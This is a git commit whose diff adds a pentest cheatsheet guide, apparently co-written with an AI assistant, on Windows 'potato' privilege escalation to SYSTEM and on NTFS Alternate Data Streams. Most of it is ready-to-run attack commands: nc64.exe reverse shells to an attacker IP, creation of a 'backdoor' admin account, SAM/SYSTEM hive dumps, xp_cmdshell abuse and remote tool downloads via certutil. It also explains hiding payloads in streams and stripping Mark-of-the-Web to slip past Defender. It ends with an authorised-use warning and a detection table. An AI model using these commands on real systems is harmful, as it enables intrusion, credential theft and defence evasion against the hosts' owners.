daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit 73b50b8fd73076caedc6df2e56d7482d0b4e9731
parent ad8eee4b87821386a6c6f2557c66bb40b1eb6942
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Tue, 15 Sep 2026 03:40:07 +0100

feat: add Potato Attacks & Alternate Data Streams companion guide

New pentest-workflow companion guide for the SeImpersonate → SYSTEM potato
family: PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, and
SweetPotato. Each gets what it abuses, requirements, a full flag table, and
an "everything it can do" note, plus a which-potato-when decision table and
flow. Adds delivery recipes from MSSQL xp_cmdshell, IIS/ASPX web shells, and
WinRM, and a SYSTEM payload cookbook.

Second half covers NTFS Alternate Data Streams: stream syntax and types,
listing (dir /r, Get-Item -Stream, streams.exe), reading, staging binaries
into a stream, the modern stage → extract → run caveat, Mark-of-the-Web
(Zone.Identifier) read/strip, removal, and detection/OPSEC/cleanup.

Bundled binaries (PrintSpoofer64, GodPotato-NET4/NET35, JuicyPotato legacy,
SweetPotato, nc64) use the existing self-hosted download triplet; the three
not yet mirrored (JuicyPotatoNG, RoguePotato, EfsPotato) link to source.
Cross-links the Windows PrivEsc cheat sheet's "which potato?" note to the
new guide.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01LGt1BFBCTS16MDy6Vewoxe

Diffstat:
Asrc/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md | 554+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/content/sheets/pentest-workflow/windows-privesc-cpts.md | 1+
2 files changed, 555 insertions(+), 0 deletions(-)

diff --git a/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md b/src/content/sheets/pentest-workflow/potato-attacks-and-ads-guide.md @@ -0,0 +1,553 @@ +--- +title: "Potato Attacks & Alternate Data Streams — Full Guide" +description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, plus NTFS Alternate Data Streams for staging, hiding, and stripping Mark-of-the-Web." +category: pentest-workflow +subcategory: "Companion Guides" +order: 25 +tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "ads", "alternate-data-streams", "ntfs", "mark-of-the-web", "pentest-workflow"] +tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell", "streams.exe"] +difficulty: advanced +updated: "2026-09-15" +source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks) + NTFS ADS tradecraft" +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) + +# Potato Attacks & Alternate Data Streams — Full Guide `fas:ClipboardList` + +> [!dashboard] What this is +> The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts#2--token-privilege-abuse). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, shows how to deliver them from an MSSQL shell / IIS web shell / WinRM, and then covers **NTFS Alternate Data Streams** — the trick you pair with the potatoes to stage the binary off a directory listing and strip Mark-of-the-Web before you run it. + +Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token. + +## The gate check — do you even have a potato path? `fas:Terminal` + +Everything here lives or dies on one line. Run it first, every time: + +```batch +whoami /priv +``` + +You are looking for either of these in the **Enabled** state: + +| Privilege | What it lets you do | Who usually has it | +|---|---|---| +| `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts | +| `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts | + +> [!warning]+ No privilege, no potato +> `fas:TriangleExclamation` +> If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal. + +### How a potato works (the shared skeleton) + +Every tool below follows the same three beats. Only step 1 changes between them. + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart LR + A["1 · Coerce SYSTEM to authenticate\nto a listener you control\n(Spooler pipe / DCOM OXID / EFS RPC)"] --> B["2 · Catch the auth and negotiate\na SYSTEM security context\n(NTLM / SSPI)"] + B --> C["3 · Impersonate the SYSTEM token\n(needs SeImpersonate)"] + C --> D["4 · CreateProcessWithToken / AsUser\n→ your command runs as SYSTEM"] +``` + +The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques. + +> [!success]+ Grab the binaries — checksum-verified, offline mirror +> `fas:Toolbox` +> Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box: +> - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) +> - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) +> - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) +> - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) +> - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) +> - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) +> +> Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato). + +--- + +## Which potato, when? `fas:Route` + +Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first. + +| Tool | Coercion primitive | Needs | Works on | Reach for it when | +|---|---|---|---|---| +| **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. | +| **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. | +| **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. | +| **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. | +| **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. | +| **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. | + +```mermaid +%%{init: {'theme':'base','themeVariables':{'background':'#191724','primaryColor':'#26233a','primaryTextColor':'#e0def4','primaryBorderColor':'#c4a7e7','lineColor':'#9ccfd8','secondaryColor':'#1f1d2e','tertiaryColor':'#31748f'}}}%% +flowchart TD + P{"whoami /priv:\nSeImpersonate or\nSeAssignPrimaryToken?"} -->|No| STOP["Not a potato box —\nservices / registry / creds / kernel"] + P -->|Yes| SPOOL{"Print Spooler\nservice running?"} + SPOOL -->|Yes| PS["PrintSpoofer\n(interactive SYSTEM shell)"] + SPOOL -->|No| GP["GodPotato\n(pick NET4 / NET35 by runtime)"] + PS -->|fails| GP + GP -->|fails| SW["SweetPotato -e EfsRpc\nor EfsPotato (swap RPC pipe)"] + SW -->|fails| NG["JuicyPotatoNG\n(-s to seek a CLSID)"] + NG -->|DCOM blocked outbound| RG["RoguePotato\n(+ socat :135 redirector)"] +``` + +--- + +## PrintSpoofer `fas:Terminal` + +**Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC. + +**Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato. + +```batch +:: Interactive SYSTEM shell in your current console — the go-to +PrintSpoofer64.exe -i -c cmd + +:: Fire a single command as SYSTEM (non-interactive) +PrintSpoofer64.exe -c "whoami" +PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add" + +:: Reverse shell back to your handler (catch with: nc -lnvp 8443) +PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop) +PrintSpoofer64.exe -d 1 -c cmd +``` + +| Flag | Meaning | +|---|---| +| `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) | +| `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell | +| `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) | +| `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) | +| `-h` | Help | + +> [!tip]+ Everything PrintSpoofer can do +> `fas:Lightbulb` +> Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered. + +--- + +## GodPotato `fas:Terminal` + +**Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler. + +**Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`. + +```batch +:: Prove it — run whoami as SYSTEM +GodPotato-NET4.exe -cmd "cmd /c whoami" + +:: Add a local admin / new user +GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add" +GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add" + +:: Reverse shell (catch with nc -lnvp 8443) +GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: .NET 3.5-only host +GodPotato-NET35.exe -cmd "cmd /c whoami" +``` + +| Flag | Meaning | +|---|---| +| `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) | +| `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) | +| `-h` | Help | + +> [!tip]+ Everything GodPotato can do +> `fas:Lightbulb` +> Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt. + +--- + +## JuicyPotatoNG `fas:Terminal` + +**Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato. + +**Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG). + +```batch +:: Default run — uses a built-in working CLSID and port 10247, runs cmd +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" + +:: Reverse shell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Let it seek a usable CLSID for this exact build +JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami" + +:: Custom COM listen port if 10247 is taken +JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami" +``` + +| Flag | Meaning | +|---|---| +| `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both | +| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | +| `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) | +| `-l <PORT>` | Local COM server listen port (default `10247`) | +| `-c <CLSID>` | Use a specific CLSID instead of the built-in default | +| `-s` | Seek — probe for a CLSID that works on this host | +| `-b` | Bruteforce all CLSIDs (loud; last resort) | +| `-i` | Interactive (run the program in the current console) | + +> [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato +> `fas:Lightbulb` +> The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary. + +--- + +## RoguePotato `fas:Terminal` + +**Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire. + +**Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato). + +```bash +# On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999) +socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 +``` + +```batch +:: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command +RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999 + +:: Reverse shell variant +RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999 +``` + +| Flag | Meaning | +|---|---| +| `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 | +| `-e <COMMAND>` | Command to execute as SYSTEM | +| `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) | +| `-c <CLSID>` | Specific CLSID to activate | +| `-p <PIPE>` | Named pipe to use (advanced) | +| `-z` | Test mode — check whether the technique will work without executing | + +> [!warning]+ RoguePotato needs egress to port 135 +> `fas:TriangleExclamation` +> If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all. + +--- + +## EfsPotato `fas:Terminal` + +**Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument. + +**Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`). + +```batch +:: Simplest form — run a command as SYSTEM +EfsPotato.exe "whoami" +EfsPotato.exe "net user backdoor P@ssw0rd123! /add" + +:: Pick a specific RPC pipe when the default is patched +:: valid pipes: lsarpc | efsrpc | samr | lsass | netlogon +EfsPotato.exe "whoami" lsarpc +EfsPotato.exe "whoami" efsrpc + +:: Reverse shell +EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +```powershell +# Compile on-target if you only have the .cs (no external toolchain needed) +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs +``` + +| Argument | Meaning | +|---|---| +| `<command>` (1st positional) | Command to run as SYSTEM | +| `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched | + +> [!tip]+ Everything EfsPotato can do +> `fas:Lightbulb` +> Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool. + +--- + +## SweetPotato `fas:Terminal` + +**Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes. + +**Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)). + +```batch +:: Default (EfsRpc mode) — run a command as SYSTEM +SweetPotato.exe -a "/c whoami" + +:: Force a specific technique +SweetPotato.exe -e EfsRpc -p C:\Windows\System32\cmd.exe -a "/c whoami" +SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami" +SweetPotato.exe -e DCOM -p C:\Windows\System32\cmd.exe -a "/c whoami" + +:: Reverse shell +SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +| Flag | Meaning | +|---|---| +| `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) | +| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | +| `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) | +| `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) | +| `-c <CLSID>` | CLSID for DCOM-based modes | + +> [!tip]+ Everything SweetPotato can do +> `fas:Lightbulb` +> It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept. + +--- + +## Delivery — getting a potato onto the box and running it `fas:RocketLaunch` + +You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers). + +### From MSSQL `xp_cmdshell` + +MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain. + +```sql +-- 1) enable xp_cmdshell +EXEC sp_configure 'show advanced options', 1; RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; + +-- 2) confirm the privilege +EXEC xp_cmdshell 'whoami /priv'; + +-- 3) stage the potato (HTTP pull from your box) +EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe'; + +-- 4) fire it as SYSTEM +EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"'; +``` + +### From an IIS / ASPX web shell + +IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`): + +```powershell +# Pull the tool, then run it — one command per web-shell request +Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe +C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +`C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/web-shells) for the shell itself. + +### From WinRM / evil-winrm + +```bash +# On your box +evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!' +``` + +```powershell +# Inside the session — upload is built into evil-winrm +upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe +C:\Windows\Temp\g.exe -cmd "cmd /c whoami" +``` + +> [!tip]+ Interactive vs. one-shot potatoes +> `fas:Lightbulb` +> **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear. + +### SYSTEM payload cookbook + +What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup. + +```batch +:: Interactive shell (PrintSpoofer / JuicyPotatoNG) +... -i -c cmd + +:: Reverse shell (any potato) — nc -lnvp 8443 on your box +... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Local admin (loud, logged — prefer a shell/token over a new account on real engagements) +... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add" + +:: Dump the SAM/SYSTEM hives for offline hash extraction +... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y" + +:: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM +... "cmd /c C:\Windows\Temp\beacon.exe" +``` + +Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`. + +--- + +## NTFS Alternate Data Streams (ADS) `ris:FileList` + +ADS are the trick you pair with the potatoes: stage the binary in a stream so it doesn't show in a directory listing, and strip Mark-of-the-Web off anything you downloaded so SmartScreen/Defender don't flag it. They're a legitimate NTFS feature, quietly abused for hiding data since Windows NT. + +### What an ADS actually is + +On NTFS, every file has at least one data stream — the **default (unnamed) stream** that holds the content you normally see. NTFS lets you attach additional **named streams** to the same file. The main file keeps its name and its reported size; the extra streams ride along invisibly. + +**Syntax:** `filename:streamname:streamtype` + +Common stream types: + +| Type | Purpose | +|---|---| +| `$DATA` | Actual data content — by far the most common, and what you'll use | +| `$INDEX_ALLOCATION` | Directory indexes (attaching this to a name creates a directory-like object) | +| others | Assorted NTFS metadata streams | + +Why it matters to both sides of the keyboard: + +- **Invisible to normal listings.** Plain `dir` and Explorer don't show streams — you need `dir /r` or PowerShell's `-Stream`. +- **They don't change the file's reported size.** The host file still shows its original size; the stream's bytes aren't counted. +- **They travel with the file on NTFS**, and are **silently stripped** when the file crosses to FAT32/exFAT, most network shares, email, or an HTTP upload. Handy for evasion; a trap if you rely on a stream surviving a copy. +- **No special permission needed.** If you can write the file, you can add a stream to it. + +### Reading a stream + +```batch +:: cmd — the classic +more < "C:\Windows\Temp\notes.txt:hidden:$DATA" +``` + +```powershell +# PowerShell — cleanest +Get-Content C:\Windows\Temp\notes.txt -Stream hidden + +# notepad opens a named stream directly +notepad C:\Windows\Temp\notes.txt:hidden +``` + +### Finding streams (both sides) + +```batch +:: cmd — /r reveals streams next to each file (look for the "file:stream:$DATA" lines) +dir /r C:\Windows\Temp +``` + +```powershell +# PowerShell — list every stream on a file, or hunt a whole tree +Get-Item C:\Windows\Temp\notes.txt -Stream * +Get-ChildItem C:\Users -Recurse | ForEach-Object { Get-Item $_.FullName -Stream * -ErrorAction SilentlyContinue } | + Where-Object Stream -ne ':$DATA' +``` + +```batch +:: Sysinternals streams.exe — purpose-built, recursive +streams.exe -s C:\Users +``` + +### Writing / staging into a stream + +```batch +:: Hide text +echo secret-loot-here > "C:\Windows\Temp\notes.txt:stash" + +:: Stash a binary inside an innocuous host file (NTFS→NTFS copy) +type C:\Tools\GodPotato-NET4.exe > "C:\Windows\Temp\log.txt:g.exe" +``` + +```powershell +# PowerShell staging +Set-Content -Path C:\Windows\Temp\notes.txt -Stream stash -Value 'secret-loot-here' +``` + +> [!warning]+ Running an EXE straight from a stream is mostly dead on modern Windows +> `fas:TriangleExclamation` +> Older Windows let you launch a process whose image *was* an ADS. Current builds block that — `start file.txt:g.exe` / `Start-Process` against a stream fails. So use ADS for **staging and hiding**, then **copy the payload back out to a normal file to execute it**: +> ```batch +> type C:\Tools\GodPotato-NET4.exe > C:\Windows\Temp\log.txt:g.exe :: hide +> more < C:\Windows\Temp\log.txt:g.exe > C:\Windows\Temp\g.exe :: extract to run +> C:\Windows\Temp\g.exe -cmd "cmd /c whoami" +> ``` +> Script and DLL loaders (`powershell`, `wscript`/`cscript`, `rundll32`, `regsvr32`) can still be *fed* from a stream via LOLBINs, but the reliable, portable pattern is stage-in-stream → extract → run. + +### Mark-of-the-Web — the ADS you meet every engagement + +Every file a browser or `Invoke-WebRequest` downloads gets a `Zone.Identifier` stream (Mark-of-the-Web). It's what makes SmartScreen and Defender treat a file as "from the internet." Reading it is a forensics staple; stripping it is an evasion staple. + +```powershell +# See where a downloaded file came from (blue-team / OSINT gold — often has the source URL) +Get-Content .\PrintSpoofer64.exe -Stream Zone.Identifier + +# Strip MOTW so SmartScreen/Defender stop nagging (two equivalent ways) +Remove-Item .\PrintSpoofer64.exe -Stream Zone.Identifier +Unblock-File .\PrintSpoofer64.exe +``` + +```batch +:: The stealthiest way to drop MOTW is to never create it: pull the tool with a +:: transport that doesn't write Zone.Identifier (SMB copy, certutil), not a browser. +certutil -urlcache -f http://10.10.14.3/PrintSpoofer64.exe C:\Windows\Temp\ps.exe +``` + +### Removing a stream + +```powershell +# Delete just one stream, keep the file +Remove-Item C:\Windows\Temp\notes.txt -Stream stash +``` + +```batch +:: cmd has no native single-stream delete — round-trip through a non-NTFS +:: filesystem (copy off to FAT/exFAT and back) strips every stream at once. +``` + +> [!info]+ How the potatoes and ADS fit together +> `fas:Lightbulb` +> The workflow: land as a `SeImpersonate` service account → stage your potato + `nc64.exe` inside an ADS on a boring file in `C:\Windows\Temp` so a casual `dir` shows nothing → strip `Zone.Identifier` (or transfer with `certutil`/SMB so it's never written) → extract to a normal path → run the potato → SYSTEM. Then clean the streams **and** the extracted files at teardown. + +--- + +## Detection, OPSEC & cleanup `fas:Shield` + +> [!danger] Authorised testing only +> `fas:TriangleExclamation` +> Potato attacks land you SYSTEM and ADS hide artefacts on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, stream, user, and hive dump you create, with full paths, and remove them at cleanup. + +**What the blue team sees:** + +| Signal | Where | +|---|---| +| `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment | +| `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 | +| Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) | +| Files/EXEs written to `C:\Windows\Temp`, spooler dirs; new `$DATA` streams | Sysmon Event 11; `Get-Item -Stream *`, `streams.exe`, `dir /r` | +| A downloaded tool's 